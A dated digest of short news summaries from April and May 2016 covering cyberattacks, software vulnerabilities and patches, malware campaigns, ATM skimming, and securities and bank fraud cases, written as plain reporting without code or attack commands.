Lost door RAT promoted via Facebook and Google’s Blogspot. Security researchers from Trend Micro reported that a remote access trojan (RAT) named, Lost Door can be customizable and difficult to detect, posing a challenge to information technology (IT) administrators after researchers found the trojan leverages a router’s Port Forward feature to access the server of a private network and disguises malicious traffic or communication as normal traffic. Attackers can mask their command and control (C&C) addresses and evade network monitoring as the servers only connect to an internal router Internet Protocol (IP) address.

5/5/16 

New York man pleads guilty to role in ATM skimming scam. A New York man pleaded guilty May 3 to Federal charges for his alleged role in a $709,000 ATM skimming scheme where the man installed skimming devices on ATMs at banks across Rhode Island in order to steal account information from 1,329 victims’ credit cards, and encoded the data onto counterfeit credit cards which were used to make fraudulent purchases. 

9 accused of losing investors $131M in ForceField Energy scheme. The U.S. Attorney’s Office for the Eastern District of New York announced May 3 charges against 9 stock promoters, brokers, and investor relations officials for defrauding investors into purchasing worthless ForceField Energy Inc., stock from December 2009 – April 2015 by secretly trading the stock in undisclosed accounts, inflating trading volume to create a false sense of demand, and concealing kickbacks to stock promoters and brokers, causing investors $131 million in losses. The U.S. Securities and Exchange Commission also filed related civil charges against the defendants. 

Attackers exploit critical ImageMagick vulnerability. Two security researchers discovered a remote code execution (RCE) vulnerability dubbed, “ImageTragick,” was leveraged in the wild and found in the open-source software, ImageMagick. Attackers could exploit the flaw to gain access to the victim’s server by creating an exploit file and assigning the file an image extension to bypass the security check, which tricks ImageMagick into converting the malicious file and activating the malicious code. 

Stored XSS bug affects all bbPress WordPress Forum versions. Automattic released its newest version of its WordPress forum plugin, bbPress 2.5.9 that patched a stored cross-site scripting (XSS) vulnerability after a security researcher from Sucuri found attackers could use the bbPress user mention (@username) system to store malicious code inside forum posts, allowing skilled attackers to craft malicious code to steal cookies from forum admins and impersonate them with elevated privileged on the WordPress backend. 

MosQUito exploit stealing legitimate traffic from WordPress and Joomla Websites. eZanga.com, Inc., published a list that revealed 9,285 Web sites were affected by a malicious campaign dubbed, MosQUito after discovering that hackers were searching for Web sites where the jQuery JavaScript library was loaded and replaced with a malicious PHP file, jQuery.min.php, to steal paid traffic from legitimate businesses and to redirect victims to another Web site controlled by the attacker.

5/4/16 

Google patches 40 vulnerabilities in Android. Google released security updates for its Android operating system (OS) patching 40 vulnerabilities including a remote code execution flaw (RCE) in Mediaserver that could allow an attacker to execute code within the software, and a privilege escalation flaw in the Android debugger that could allow a malicious application to execute arbitrary code in Android debugger or kernel, among other patched flaws. 

Accellion patches flaws found during Facebook hack. The Computer Emergency Response Team (CERT) Coordination Center (CC) released an advisory addressing seven vulnerabilities in the Accellion File Transfer Appliance after a security consultant discovered one of the flaws could be leveraged to upload a web shell, which is an SQL injection, due to improper handling of data in the “client_id” parameter in “/home/seos/courier/security_key2.api.” Other vulnerabilities include three cross-site scripting (XSS) flaws and a number of local privilege escalation issues related to incorrect default permissions. 

Millions of credentials exposed by PwnedList flaw. A security researcher discovered a parameter tampering vulnerability in a new PwnedList service called Vendor Security Monitoring which could allow an attacker to add any desired domain through a flaw in the service’s two-step authentication process and submit arbitrary data by tampering with the request. An attacker with an active PwnedList account can exploit the flaw to add the domain of any major company to generate a list of all compromised email accounts. 

Compromised RDP Servers used in corporate ransomware attacks. Researchers from Fox-IT discovered that attackers could disseminate ransomware through a compromised remote desktop server by using brute force attacks to infiltrate a remote desktop server connected to the Internet and use privilege escalation methods to find domain administration status. Once an attacker infiltrates a system and gains administrative privileges, they can extract data, recruit into a botnet, deliver spam, and demand monetary funds from a compromised company.  

5/3/16 

Man in $5M ATM ‘skimming’ ring pleads guilty. A Romanian man pleaded guilty April 29 to Federal charges for his role in a $5 million ATM skimming ring where he and co-conspirators allegedly installed skimming devices on ATMs at banks in New Jersey, New York, Connecticut, and Florida, and transferred the stolen data onto blank ATM cards which were used to withdraw funds from customers’ accounts. Officials stated that a total of 16 people were charged for their involvement and one suspect remains at large. 

Cleveland FBI asks for help identifying ‘breakdown lane bandit.’ FBI officials and local police departments in Cleveland are searching April 29 for a man dubbed the “BDL Bandit” who is suspected of committing three bank robberies in the Cleveland area since March, including a PNC Bank branch, a First Merit Bank branch, and a US Bank branch. Authorities stated that the suspect is armed and believed to have an accomplice. 

Police seeking Garfield bank robber who may be ‘Count Down Bandit.’ Authorities are searching for a man suspected of robbing an M&T Bank branch in Bergen County, New Jersey, April 28. Officials stated that the suspect is believed to be the “Count Down Bandit,” a man allegedly responsible for seven other bank robberies in Bergen and Passaic counties since July 2015. 

Baseball Hat Bandit:’ Guaranteed $1,000 reward to identify serial bank robber wearing different caps for slew of capers. Authorities offered a reward April 29 in exchange for information about a man dubbed the “Baseball Hat Bandit,” who is suspected of robbing five banks in King and Pierce counties in Washington. 

Serious flaw found in “PL/SQL Developer” update system. Allround Automations released a new version of its PL/SQL Developer product after an application security consultant discovered that version 11.0.4, and earlier versions, used Hyper Text Transfer Protocol (HTTP) updates and did not validate the downloaded file’s authenticity, allowing a man-in-the-middle (MitM) attacker to replace the authentic Uniform Resource Locator (URL) with another URL that leads to a malicious file, as well as replace the download link with an arbitrary command that will execute in a user’s context during the PL/.SQL Developer update process. 

Microsoft adds Nano server to bug bounty program. Microsoft reported April 29 that it is offering large monetary rewards for vulnerabilities found in the Nano Server installation option of its Windows Server 2016 Technical Preview 5 and all subsequent releases after stating that the product was ideal for a compute host for Hyper-V virtual machines, a storage host for Scale-Out File Server, a Domain Name System (DNS) server, and a host for cloud apps, and if infected, could pose severe damages to each component. 

Valve fixes steam crypto bug that exposed passwords in plaintext. Valve updated its Steam gaming client after a security researcher found that the lack of Message Authentication Code (MAC) in its application’s crypto package allowed an attacker to carry out man-in-the-middle (MitM) attacks, enabled victims to become Valve Anti-Cheat (VAC) banned, or potentially exposed users’ passwords in plaintext. 

Decrypter for Alpha ransomware lets victims recover files for free. A team of security researchers discovered and decrypted a new ransomware version called Alpha ransomware, which demands targets pay $400 worth of iTunes gift cards to decrypt encrypted files by using AES-256 encryption to lock files, change each file’s name with the .encrypted extension, add a ransom note in text format in each folder, change the target’s wallpaper, and delete itself to avoid detection. Researchers found a weakness in the ransomware’s encryption routine and released a decrypter to help victims retrieve locked files. 

Crooks deliver android malware via Fake Google Chrome updates. Security researchers from Zscaler discovered that cyber criminals were distributing fake Google Chrome update packages disguised as Android application package (APK) files affecting Android users to steal a target’s credit card information, terminate the device’s antivirus software, monitor incoming and outgoing calls and Short Message Service (SMS) messages, as well as start or end calls, among other actions. Attackers were seen using large collections of domain names to host the malware, which were changed a regular intervals. 

BPlug trojan hides in Chrome Extensions and Spams your Facebook friends. Security researchers from Dr. Web discovered that over 12,000 users were infected with the trojan titled, Trojan.BPlug.1074 or BPlug after the bug was seen hiding in Google Chrome’s extensions and collecting a target’s Facebook user identifier (UID) and their cross-site request forgery (CSRF) token to execute actions on a Facebook users’ behalf. Attackers can send out malicious links disguised as YouTube videos to Facebook friends in an aim to increase the trojan’s infection. 

Malware leverages Windows “God Mode” for persistency. Researchers from Intel Security reported that the malware dubbed, “Dynamer” was abusing the Microsoft Windows Easter Egg called “God Mode” function to gain persistency on an infected machine by installing itself into a folder inside the %AppData% directory, creating a registry run key, and executing its capability normally. Researchers advised affected users to terminate the malware’s process via Task Manager and run a specially crafted command from the command prompt. 

5/2/16 

Slack API credentials left in GitHub repos open new door for corporate hacking. Security researchers from Detectify Labs reported that companies in all industries may be at risk after finding that developers were leaving sensitive credentials inside open-sourced code following a scan on GitHub projects which revealed over 1,500 Slack access tokens were available online. The access tokens could allow attackers to access application program interfaces (APIs) and harvest user data, view Slack channel conversations, group information, private messages, and automate the use of Slack’s search feature. 

Google and Mozilla address security issues in Chrome 50 and Firefox 46. Google released its newest web browser, Chrome 50.0.2661.94 which patched nine security flaws including two use-after-free vulnerabilities, one vulnerability in the Blink engine’s V8 bindings, and one vulnerability in the browser’s extensions component, among other patched flaws. 

Microsoft patches Office 365 platform against SAML exploit. Microsoft released a temporary patch for its Security Assertion Markup Language (SAML) Service Provider implementation used for its Office 365 platform after two security researchers found the product had an authentication bypass vulnerability that allowed attackers to authenticate themselves on a service and access user’s data on all shared domains. Microsoft was working to release a permanent patch. 

OpenSSL to patch high severity vulnerabilities. The OpenSSL Project reported that it will release OpenSSL versions 1.0.2h and 1.0.1t May 3 to patch several flaws affecting the crypto library as well as flaws rated as high-severity vulnerabilities. 

Pentagon working to ‘take out’ Islamic State’s internet. Pentagon officials reported April 28 that the U.S. military’s Cyber Command (CYBERCOM) was working to destroy the Islamic State’s Internet connection and leave the terrorist group in virtual isolation by interrupting the Islamic State’s command and control (C&C), interrupting the group’s ability to move funds, and interrupting the group’s ability to recruit externally, among other actions. The task will be the command’s first major combat operation in relation to the Islamic State threat.

4/29/16 

Bloods-linked gang members charged with running $414G identity-theft ring. Officials from the New York County District Attorney’s Office announced April 26 that 39 gang members were charged for their roles in a $414,000 identity theft scheme where the group used stolen bank information from the Dark Web to create phony credit cards used to make fraudulent purchases at Barneys and Sacks Fifth Avenue stores and sold the goods to fund personal expenses. Officials stated a subsequent search of the suspects’ apartments in Queens and Brooklyn, New York revealed computers and credit card making equipment, among other illicit materials. 

Critical, high severity flaws patched in Firefox. Mozilla released its web browser, Firefox 46 that patched a total of 14 vulnerabilities including 4 critical vulnerabilities affecting the browser engine, which could cause crashes and potential arbitrary code execution, as well as a high severity vulnerability that could be exploited via specially crafted Web content and cause an exploitable crash, among other flaws. 

Time for a patch: Six vulns fixed in NTP daemon. Security researchers from Cisco’s Talos Security Intelligence and Researcher Group discovered five vulnerabilities in Network Time Protocol daemon (ntpd) after its ongoing ntpd evaluation revealed attackers could craft User Datagram Protocol (UDP) packets to cause a denial-of-service (DoS) condition or prevent the correct time from being set, among other actions. The vulnerabilities were patched in Network Time Protocol (NTP) version 4.2.8p7. 

Cisco finds backdoor installed on 12 million PCs. Cisco’s Talos Security Intelligence and Research Group reported that a Tuto4PC’s OneSoftPerDay application was discovered to install potentially unwanted programs (PUPs), harvest users’ personal information, and was considered to be a backdoor for 12 million personal computers (PCs) after an analysis revealed that an increase in generic trojans were found when about 7,00 unique samples displayed names including “Wizz” in some of the domains. 

Over 7M Minecraft mobile credentials exposed after Lifeboat data breach. Lifeboat Networks reported April 27 that its network was compromised in January, exposing its users’ login names, passwords, and email addresses in the Minecraft Pocket Edition mobile game after a security researcher found over 7 million user credentials were available online. Lifeboat forced its customers to reset their passwords discretely and stated they started using stronger algorithms to guard user data. 

Waze drivers can be tracked, network flooded with fake traffic. Six researchers from the University of California, University of Santa Barbara, and the Tsinghua University discovered that they could create fake traffic jams and track the movements of any Waze user by reverse engineering the Waze app communications protocol and creating Sybil attacks to insert thousands of malicious users inside the Waze networks. The attacks could manipulate the app’s behavior and allow attackers to pose as Waze users when communicating with the app’s Google server. 

Attackers increasingly abuse open source security tools. Security researchers from Kaspersky Lab reported that the open source security tool, Browser Exploitation Framework (BeEF) was being leveraged by an advanced persistent threat (APT) group named NewsBeef to track and steal users’ browsing history from compromised Web sites through flaws in content management systems. In addition, researchers reported that other APT actors were using open source tools in their operations to execute malware across the globe. 

Verizon 2016 DBIR: What you need to know. Verizon released its 2016 Data Breach Investigations Report (DBIR) which revealed current information technology (IT) trends and the overall cyberattack landscape after conducting an analysis on over 100,000 security incidents, which confirmed 2,260 data breaches occurred across 82 different countries in 2015, with the majority of breaches occurring due to human nature via phishing campaigns.

4/28/16 

Feds break up money-laundering scheme linked to fraudulent Armenian passports. The U.S. District Court in Santa Ana unsealed charges the week of April 18 against 7 California residents for their roles in a $14 million identity theft and international money laundering scheme where the group filed approximately 7,000 fraudulent tax returns by using stolen identities to create fraudulent foreign passports from the Republic of Armenia, Georgia, and the Czech Republic in order to open numerous bank accounts and mailboxes, which were used to deposit and launder the refunds. Officials stated that a total of 10 people were involved in the fraud scheme that sought a total of $38 million in fraudulent tax returns. 

DDoS aggression and the evolution of IoT risks. Neustar released its findings after conducting a survey on over 1,000 information technology (IT) professionals across 6 continents which revealed that 76 percent of companies are investing in distributed denial-of-service (DDoS) protection as DDoS attacks are continuing to evolve from single large attacks to multi-vector attacks. Forty-seven percent of attacked organizations were participating in information sharing on threats and counter measures to mitigate future assaults. 

Information stealer “Fareit” abuses PowerShell. Security researchers from Trend Micro discovered a new variant of the Fareit malware was stealing login details, Bitcoin-related data, and other personal information from victims after the malware was delivered via spam emails and executed through two different tactics including Word documents and malicious macros, and PDF documents and Windows PowerShell. Attackers could use PDF files to execute PowerShell via the OpenAction event that allows Fareit to download onto a victim’s machine and collect information. 

The Pirate Bay malvertising campaign pushes Cerber ransomware. Security researchers from Malwarebytes and RiskIQ reported that malicious ads on The Pirate Bay torrent portal were redirecting victims, using older Windows and Internet Explorer software to another Uniform Resource Identifier (URL) where the Magnitude exploit kit (EK) would leverage a Flash zero-day flaw to compromise vulnerable personal computers (PCs), install the Cerber ransomware, and install potentially unwanted software (PUP).

4/27/16 

Miami woman had 371 counterfeit credit cards in luggage, police say. A Miami woman was arrested April 23 at Miami International Airport after authorities noticed suspicious masses in her luggage during a security checkpoint screening, prompting a secondary hand inspection of her suitcase which revealed 371 counterfeit credit cards. A subsequent search revealed two additional fraudulent credit cards in the woman’s wallet. 

Facebook bug allowed attackers to take over accounts on other sites. Facebook patched a flaw in its account registration process after security researchers from Bitdefender discovered the flaw could allow attackers to take over users’ profiles on Web sites where the Facebook Social Login feature was available by adding an attacker’s email address as a secondary address, enabling the attacker to verify the profile and make modifications to the account information. 

Malicious insiders could tap ransomware-as-a-service for profit. Security researchers from Imperva revealed that the ransom-as-a-service (RaaS) model could be leveraged by malicious attackers to exploit the organization’s unstructured data, locate sensitive data, and encrypt the company’s most valuable information after discovering that authors and distributors of the malware use anonymous Bitcoin addresses and the Tor network to ensure they receive their ransom money and stay undetected from law enforcement agencies.

4/26/16 

Compromised credentials still to blame for many data breaches. A Cloud Security Alliance survey found that a lack of scalable identity access management systems, a lack of ongoing automated rotation of cryptographic keys, passwords, and certificates, as well as failure to use multifactor authentication were the major causes of data breaches. The findings also indicated that 22 percent of companies who suffered a data breach, attributed the breach to compromised credentials. 

Critical flaws in HP Data Protector open servers to remote attacks. Hewlett Packard released security updates for its HP Data Protector software patching six critical vulnerabilities for all versions prior to 7.03_108, 8.15, and 9.06 which could allow a remote code execution flaw or unauthorized disclosure of information via unauthenticated users or through an embedded Secure Sockets Layer (SSL) private key, which could increase the chance of man-in-the-middle (MitM) attacks. 

Attackers use PowerShell, Google Docs to deliver “Laziok” trojan. Security researchers from FireEye reported that attackers were able to bypass Google’s security checks and upload a trojan named Laziok to Google Docs with the intention to steal information about the user’s system by loading obfuscated JavaScript code known as “Unicorn,” as well as using “Godmode” and PowerShell to execute the malware. 

Attacker friendly hosting firm leveraged by Pawn Storm hackers. Security researchers from Micro Trend reported that the Pawn Storm Group was abusing a small Virtual Private Server (VPS) registered in United Arab Emirates (UAE) to attack governments in 80 counties including Bulgaria, Greece, Malaysia, Ukraine, and the U.S., and were seen executing more than 100 cyber-attacks within the past year. In addition, it was discovered that the group used the VPS hosting provider for command & control (C&C) servers, exploit sites, spear-phishing campaigns, domestic espionage in Russia, and Web mail phishing sites targeting high-profile users.

4/25/16 

Adobe patches flaw in analytics AppMeasurement for Flash Library. Adobe release its Analytics AppMeasurement for Flash library version 4.0.1 which patched a Document Object Model (DOM)-based cross-site scripting (XSS) vulnerability after a security researcher discovered the vulnerability when the debugTracking feature was enabled. The flaw affects version 4.0 and earlier platforms. 

Law enforcement, government agencies see phishing as main cyber risk. The Global Cyber Alliance (GCA), a group of government representatives from the U.S. and the United Kingdom, agreed to promote the usage of Domain-based Message Authentication, Reporting & Conformance (DMARC) protocol to make it more difficult for attackers to tamper with original documents as phishing attacks were ranked as the top cyber threat following research that revealed spear-phishing campaigns increased by 55 percent from 2015. 

DDoS attacks continue to rise in power and sophistication. Imperva released its Global DDoS Threat Landscape Q1 2016 report which revealed that distributed denial of service (DDoS) attacks were more advanced and sophisticated after an analysis revealed that attackers increased the use of browser-like DDoS bots with capabilities of bypassing security challenges by 36.6 percent and attackers were seen executing new ways to perform application layer assaults including Hypertext Transfer Protocol Secure (HTTPS) POST flood.

4/22/16

Man arrested in Tenn. accused of skimming 1,800 credit cards. Officials reported April 20 that a man was arrested and charged with criminal simulation April 7 after police found thousands of merchandise in the culprits’ vehicle along with the stolen identity of 150 people during a traffic stop violation. Investigators reported that the man stole the credit card data of 1,800 people across several States by secretly installing a skimming device on gas pump stations.

“FIN6” cybergang steals millions of cards from PoS systems. FireEye reported that the cybercriminal group, dubbed “FIN6” which has been targeting thousands of retail and hospitality Point-of-Sale (PoS) systems was increasing its revenue by stealing millions of credit card information and selling the information on an underground market, as well as possessing valid credentials for each of the target’s companies’ networks. Researchers were unsure how each attacker compromises a system due to the lack of forensic evidence.

Cisco patches severe flaws in Wireless LAN controller. Cisco released software updates for its Wireless LAN Controller (WLC) products which patch several critical flaws and high severity denial-of-service (DoS) vulnerabilities including an issue related to the Hypertext Transfer Protocol (HTTP) Universal Resource Language (URL) redirection feature of WLC software that can allow an unauthenticated attacker to remotely trigger a buffer overflow and cause affected devices to enter a DoS condition.

New tool aims to generically detect Mac OS X ransomware. Security researcher from Synack developed a tool, named “RansomWhere?” that will detect and block all types of file-encrypting ransomware on Apple Mac OS X systems with the aim to constantly monitor file systems for the creation of encrypted files by suspicious processes. The tool was developed after researchers received several reports of ransomware targeting Mac OS X users within the past year.

4/21/16 

3 wanted in Gaston Co. skimming case. Gastonia Police reported April 19 that they were searching for 3 suspects believed to be involved in 21 fraud cases after the trio installed skimming devices in Gaston County gas stations and stole customer’s debit card information and personal identification numbers (PINs). 

SEC announces financial fraud cases. The U.S. Securities and Exchange Commission (SEC) reported April 19 that Logitech International agreed to pay over $7.5 million in Federal penalties for allegations that the company inflated its 2011 financial records to meet its earning guidance during a 5-year period and that 4 of its executives violated Logitech’s warranty accrual accounting, minimized the write-downs of millions of dollars of excess component parts, and failed to remunerate an earlier acquisition. The SEC also stated that 3 former executives at Ener1, Inc., agreed to pay a total of $180,000 in penalties after the trio overstated revenues and assets in 2010 and overstated assets in the first quarter of 2011. 

New PWOBot Python malware can log keystrokes, mine for bitcoin. Security researchers from Palo Alto Networks discovered a new malware family dubbed PWOBot was encoded in Python and PWOBot modules can execute other binaries, launch an Hypertext Transfer Protocol (HTTP) server, log keystrokes, execute custom Python code, query remote Universal Resource Languages (URLs), as well as mine for bitcoins by using the victim’s central processing unit (CPU) or graphics processing unit (GPU). 

Oracle patches 138 bugs, 9 in Java, 31 in MySQL. Oracle released patches addressing 136 security issues, of which 9 were considered critical flaws, in 49 different product suites including Oracle Database, Java, MySQL, Solaris, Berkeley Database, and VirtualBox, among other products. Users were advised to update their software to the latest versions. 

Security firm discovers secret plan to hack numerous websites and forums. Security researchers from SurfWatch Labs reported that they prevented a new trojan named Thanatos, from potentially infecting thousands of Invision Power Services (IPS) servers after researchers scanned the Dark Web and discovered attackers were planning to exploit a vulnerability in the infrastructure of IPS by accessing the Web sites of IPS’ customers and adding an exploit kit on each page. IPS was informed of the attacker’s scheme and shut down all its access points. 

Kaspersky announces antivirus for Industrial Control Systems (ICS). Kaspersky launched a new cyber-security tool, named Industrial CyberSecurity, which will help Industrial Control Systems/Supervisory Control And Data Acquisition (ICS/SCADA) equipment become more resilient against cyberattacks and will prevent attackers from damaging railway systems, nuclear power plants, oil and gas companies, and various other SCADA equipment by including an “observability mode” which will alert operators of cyberattacks, personnel faults, and anomalies inside an industrial network, among other features.

4/20/16 

Pro-ISIS group defaces 88 websites in three-day rampage. A hacking group titled, Team System Dz reportedly hacked and defaced 88 Web sites from France, Israel, the U.K, and the U.S. April 14 – April 16, leaving pro-Islamic State messages on each compromised Web page, many of which were running WordPress systems. 

Google analyzes effectiveness of website hack notifications. Google and the University of California, Berkeley released a study revealing that nearly 60 percent of hijacking incidences were resolved by Webmasters over an 11-month period with about 22 percent of Search Quality Web sites and 6 percent of Safe Browsing Web sites reinfected within 1 month. Google advised Webmasters to sign up for Google’s Search Console to ensure they are notified when their Web sites become compromised. 

New CryptXXX ransomware locks your files, steals bitcoin and local passwords. Security researchers from Proofpoint discovered the CryptXXX ransomware had an infostealer component and could harvest information and credentials about a user’s local instant messenger clients, email clients, FTP clients, and Internet browser information, as well as steal bitcoins after finding that the CryptXXX ransomware was similar to an older Reveton ransomware and allegedly created by the authors of the Angler exploit kit (EK). 

Ransomware uses blockchains to transmit decryption keys. Researchers from Sucuri discovered that ransomware developers were using blockchains to deliver decryption keys to victims infected with ransomware, after discovering that the usage of blockchains to transmit decryption keys is much more reliable for attackers than using payment gates and third-party compromised Web sites, ensuring that the entire transaction process is public and transparent while hiding attackers’ real Internet Protocols (IPs) addresses.

4/19/16 

Valencia man pleads guilty to fraud in $20 million precious metal investment scam. The U.S. Attorney’s Office charged the owner of Superior Gold Group, LLC., and Superior Equity Group, LLC., for 4 counts of wire fraud, 5 counts of wire fraud, and 2 counts of money laundering as a part of a $20 million metal investment scam April 15 after the man defrauded more than 300 investors by failing to disclose material information to investors pertaining to the delivery of precious metals and cost investors to lose nearly $11 million while the man used the investors’ money for personal expenditures from October 2007 – December 2010. 

SEC charges litigation marketing company with bilking retirees. The U.S. Security and Exchange Commission charged Los Angeles-based Prometheus Law and its two co-founders with conducting a Ponzi-like scheme April 15 after the duo raised $11.7 million from about 250 investors and retirees, promising investors that the funds would be allocated for marketing and advertising purposes to locate plaintiffs for class-action lawsuits, but instead the two diverted about $5.6 million for their personal use while failing to deliver the promised 100 to 300 percent returns to investors. 

3.2 million devices exposed to ransomware attacks: Cisco. Security researchers from Cisco Talos discovered that approximately 3.2 million computers were vulnerable to file-encrypting ransomware due to out-of-date software after an Internet scan on already compromised devices revealed that more than 2,100 backdoors across 1,600 Internet Protocol (IP) addresses were associated with governments, schools, aviation companies, and other organizations. Cisco advised administrators to disable external access to infected machine to keep attackers away. 

C99 webshell increasingly used in WordPress attacks. IBM Security reported that there was a 45 percent increase in attacks using a variant of the PHP webshell dubbed, C99 in WordPress Web sites after IBM identified nearly 1,000 attacks in February and March. 

Flaws found in Accuenergy, Ecava ICS products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released advisories detailing several flaws in its ICS products from Accuenergy Corporation, Ecava, and Sierra Wireless Company including an authentication bypass issue in Acuvim II and Acuvim IIR products, a security issue in Accuenergy devices, and an information disclosure vulnerability in Sierra’s Wireless ACEmanager product, among other vulnerabilities. 

New USB-C standard can help fight USB malware. The USB Implementers Forum (USB-IF) reported that it created a new standard titled, USB Type-C Authentication that will help protect USB-C capable devise from low-end USB chargers that may inflict damage to a user’s device and will help prevent USB malwares from infecting a device as the USB-C Authentication only sends data to a device that adheres to the strict USB-C specifications. 

Decrypter available for AutoLocky, Locky ransomware copycat. A security researcher from Emsisoft developed a decrytper for a new ransomware named AutoLocky, a variant of the Locky ransomware, which can encrypt a victim’s file by tricking a victim into accessing a malicious link created inside the Start Menu StartUp folder named “Start.Ink.” The decrypter was discovered after researchers found a flaw in the ransomware. 

Researcher identifies XSS filter bypass in Microsoft Edge. A security researcher form PortSwigger discovered a bypass flaw in Microsoft’s Edge’s built-in cross-site scripting (XSS) filter that could allow attackers to run malicious JavaScript code inside its Edge Web browser while exploring several Web sites. Microsoft released a proof-of-concept code to users and reported a similar issue was seen in its Internet Explorer Web browser. 

VMware patches critical vulnerability. VMware released updates for several of its products including a patch for a critical vulnerability in its Client Integration Plugin (CIP) that could have allowed an attacker to execute a man-in-the-middle (MitM) attack or session hijacking attack by tricking a vSphere Web client user to visit a specially crafted Web site. VMware advised its customers to update all programs to patch the flaw. 

Western Digital user data exposed by DNS issue. A security researcher discovered that a Western Digital (WD) nameserver, supporting the company’s My Cloud NAS products, was not configured properly and posed a Domain Name System (DNS) flaw that could have been exploited by an attacker to conduct a zone transfer and gain access to a zone file, which can contain valuable user data for attackers to exploit a zero-day vulnerability in the products. WD corrected the faulty configuration after scanning all its servers and reviewing all the architecture and processes in place for modifying the configuration of nameservers.

4/18/16 

SEC case freezes assets of ski resort steeped in fraudulent EB-5 offerings. The U.S. Securities and Exchange Commission charged two owners of Jay Peak Inc., and its eight business partners for conducting a Ponzi-like fraud scheme April 14 after the group misused more than $350,000 million, which was raised through investments and solicited under the EB-5 Immigrant Investor Program by using the funds for personal expenses and other-than-stated purposes while omitting key information and making false statements to investors in an effort to construct ski resort facilities and a biomedical research facility in Vermont. 

9 charged in alleged San Jose car insurance fraud ring. The Santa Clara County District Attorney’s Office reported April 13 that a San Jose body shop manager, his girlfriend, and seven other body shop owners were charged with insurance fraud after the group allegedly made more than $140,000 by filing false insurance claims following the group’s fabrication of over 20 vehicle accidents listed under counterfeit names from 2011 – 2015. The group purchased the insurance policies days before each incident and purposely damaged each car to file claims to several insurance company. 

Hybrid trojan “GozNym” targets North American banks. Researchers from IBM Security discovered a hybrid trojan, dubbed “GozNym,” which was reported to be similar to the Nymaim dropper and the Gozi financial malware, leverages Nymaim dropper’s stealth and persistence while adding trojan capabilities from Gozi’s ISFB parts to facilitate fraud via infected Internet browsers. The trojan is believed to have stolen millions of dollars from victims, targeting 22 financial institutions in the U.S. and Canada including banks, credit unions, e-commerce platforms, and retail banking. 

No patches for QuickTime Flaws as Apple ends support on Windows. ZDI reported that Apple will no longer release security updates for Window versions of QuickTime after a security researcher from Source Incite found a heap corruption vulnerability that could allow an attacker to exploit the flaw for remote code execution (RCE) once a victim accesses a maliciously crafted Web site or file. Apple released instructions on ways to remove QuickTime for Window users and advised users to remove legacy plugins to enhance their personal computer (PC) security. 

Google, Microsoft address problems in their URL shorteners. An independent security researcher and a professor at Cornell Tech discovered that many Universal Resource Language (URL) shortening services used by Google and Microsoft, employ short random character tokens that can allow an attacker to infiltrate potential private files holding sensitive information using brute-force attacks. The researchers found the flaw after beginning a series of automated scans on Microsoft’s 1drv.com and found it exceptionally easy to brute-force its small 6-character URLs. 

Clever techniques help malware evade AV engines. Security researchers from FireEye released a study titled, Ghost in the Endpoint which revealed that various components of malware went undetected for an extended period of time by antivirus programs including a backdoor dubbed “GOODTIMES,” which was left undetected due to its disguise as an Excel file (XLSX) while leveraging a Flash Player exploit. 

Lizzard Squad downs Blizzard servers with massive DDoS attacks. A Blizzard spokesman reported that its European and U.S. servers that host games such as World of Warcraft, Diablo 3, and Starcraft 2 experienced connectivity and latency issues for several hours April 14 following an potential denial of service (DDoS) attack allegedly conducted by Lizard Squad hacking group. Blizzard technical support was working to mitigate the impact of the attacks. 

Microsoft issues optional Windows update to fix MouseJack vulnerability. Microsoft released its monthly security updates addressing several vulnerabilities including a flaw dubbed, MouseJack after security researchers from Bastille found an attacker could spoof data from a wireless device and force the Universal Serial Bus (USB) dongle to send fraudulent instructions to the connected personal computer (PC) and execute malicious actions.

4/14/16 

Adobe patches flaws in Creative Cloud, RoboHelp. Adobe released Creative Cloud version 3.6.0.244, which patched an important vulnerability in the sync process that affected Creative Cloud Libraries version 3.5.1.209 and earlier versions, as well as a security hotfix for RoboHelp Server version 9, which patched a critical vulnerability linked to the Structured Query Language (SQL) queries that could lead to information disclosure, among other patched vulnerabilities. 

Another IBM Java patch bypassed by researchers. Researchers from Security Explorations discovered that IBM’s patch for Java’s “issue 70” was inefficient and could be easily bypassed and exploited for a complete sandbox escape flaw against Java versions 7 and 8 after the patches did not address the root causes of the vulnerabilities or introduce security checks into the code. Security Explorations published a report advising how IBM’s patch can be bypassed and released a Proof-of-Concept (PoC) code for the flaw. 

Links found between different ransomware families. Researchers from AlienVault released a report addressing several similarities between PowerWare and PoshCoder ransomware including the use of the RijndaelManaged class and that both ransomware encrypt the same file types, which suggests that the two threats are connected. In addition, the report stated several similarities between Rokku and Chimera ransomware including the use of the ReflectiveLoader function, which is used in both ransomware for reflective dynamic link library (DLL) injection to load a library from memory into a host process. 

Over half a billion personal records were stolen or lost in 2015. Symantec Corporation released a report which stated that in 2015 many companies avoided disclosing the full details of their data breaches after researchers found that over 429 million records were lost or stolen and that data breaches grew by 85 percent compared to data breaches in 2014. In addition, the report stated that 75 percent of popular Web sites had major vulnerabilities; of which, 15 percent were considered as critical flaws. 

Improved Qbot worm targets public institutions. Researchers from BAE Systems discovered that an improved version of the Qbot malware was targeting public organizations such as police departments, hospitals, and universities after finding that the malware’s developers had made several improvements to avoid detection and that more than 54,000 international machines were part of the botnet, with 85 percent of infections listed in the U.S. Researchers noted that cyber attackers distributed the Qbot malware via compromised Web sites that lead to the RIG exploit kit (EK).

4/13/16 

Goldman Sachs agrees to pay more than $5 billion in connection with its sale of residential mortgage backed securities. The U.S. Department of Justice announced April 11 that Goldman Sachs Group, Inc., agreed to pay a total of $5.06 billion to settle charges related to the firm’s conduct in the packaging, securitization, marketing, sale, and issuance of residential mortgage-backed securities from 2005-2007 after the firm falsely assured prospective investors that the securities it sold were backed by sound mortgages, thereby causing billions of dollars in losses to financial institutions. As part of the settlement, Goldman Sachs must pay a civil penalty, provide monetary relief to homeowners and distressed borrowers, and pay a fine to settle claims with other Federal and State entities, among other requirements. 

Wells Fargo admits deception in $1.2 billion U.S. mortgage accord. The U .S. Department of Justice announced April 8 that it reached a $1.2 billion settlement with Wells Fargo & Company and resolved claims with a former vice president after the bank admitted to falsely certifying that many of its home loans qualified for Federal Housing Administration insurance from 2001-2008, and failing to file timely reports on several thousand loans with material defects from 2002-2010. The agreement also resolved claims by Federal prosecutors in California that Wells Fargo-owned American Mortgage Network, LLC allegedly issued false loan certifications. 

Ramdo Click-Fraud malware continues to evolve. Security researchers from Dell SecureWorks and Palo Alto Networks released an analysis on the Ramdo click-fraud malware, also known as Redyms, which stated that the Ramdo malware was capable of downloading and installing additional malicious software on infected devices after it tricks users into selecting an online ad from other infection systems. The report stated that while the malware was not very sophisticated, its operators were actively working on implementing new features and methods to avoid detection and prevent analysis. 

